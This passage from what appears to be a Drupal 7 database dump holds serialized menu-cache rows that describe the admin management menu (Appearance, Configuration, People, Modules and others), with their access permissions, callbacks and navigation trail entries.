a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:3:{i:29;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"29\";s:4:\"plid\";s:2:\"18\";s:9:\"link_path\";s:19:\"admin/people/create\";s:11:\"router_path\";s:19:\"admin/people/create\";s:10:\"link_title\";s:8:\"Add user\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:2:\"29\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:23:\"a:1:{i:0;s:6:\"create\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:12:\"admin/people\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:8:\"Add user\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"388\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:45;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"45\";s:4:\"plid\";s:2:\"18\";s:9:\"link_path\";s:19:\"admin/people/people\";s:11:\"router_path\";s:19:\"admin/people/people\";s:10:\"link_title\";s:4:\"List\";s:7:\"options\";s:100:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:50:\"Find and manage people interacting with your site.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:2:\"45\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:12:\"admin/people\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:4:\"List\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:50:\"Find and manage people interacting with your site.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:49;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"49\";s:4:\"plid\";s:2:\"18\";s:9:\"link_path\";s:24:\"admin/people/permissions\";s:11:\"router_path\";s:24:\"admin/people/permissions\";s:10:\"link_title\";s:11:\"Permissions\";s:7:\"options\";s:114:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:64:\"Determine access to features by selecting permissions for roles.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:2:\"49\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:40:\"a:1:{i:0;s:22:\"administer permissions\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:40:\"a:1:{i:0;s:22:\"user_admin_permissions\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:12:\"admin/people\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:11:\"Permissions\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:64:\"Determine access to features by selecting permissions for roles.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}}s:10:\"node_links\";a:0:{}}',0,1423658781,1),('links:navigation:page:node/2/edit:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:3:{i:0;i:0;i:5;s:1:\"5\";i:41;s:2:\"41\";}s:12:\"active_trail\";a:3:{i:0;i:0;i:5;s:1:\"5\";i:41;s:2:\"41\";}}',0,1423658929,1),('links:navigation:page:node/2/track:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:3:{i:0;i:0;i:5;s:1:\"5\";i:356;s:3:\"356\";}s:12:\"active_trail\";a:3:{i:0;i:0;i:5;s:1:\"5\";i:356;s:3:\"356\";}}',0,1423659004,1),('links:navigation:page:node/2:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:2:{i:0;i:0;i:5;s:1:\"5\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:5;s:1:\"5\";}}',0,1423658921,1),('links:navigation:page:node/5/track:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:3:{i:0;i:0;i:5;s:1:\"5\";i:356;s:3:\"356\";}s:12:\"active_trail\";a:3:{i:0;i:0;i:5;s:1:\"5\";i:356;s:3:\"356\";}}',0,1423659018,1),('links:navigation:page:node/5:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:2:{i:0;i:0;i:5;s:1:\"5\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:5;s:1:\"5\";}}',0,1423659015,1),('links:navigation:page:node/6:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:2:{i:0;i:0;i:5;s:1:\"5\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:5;s:1:\"5\";}}',0,1423775008,1),('links:navigation:page:node/add/article:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:3:{i:0;i:0;i:6;s:1:\"6\";i:219;s:3:\"219\";}s:12:\"active_trail\";a:3:{i:0;i:0;i:6;s:1:\"6\";i:219;s:3:\"219\";}}',0,1423658892,1),('links:navigation:page:node/add:en:0:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1426806523,1),('links:navigation:page:node/add:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a: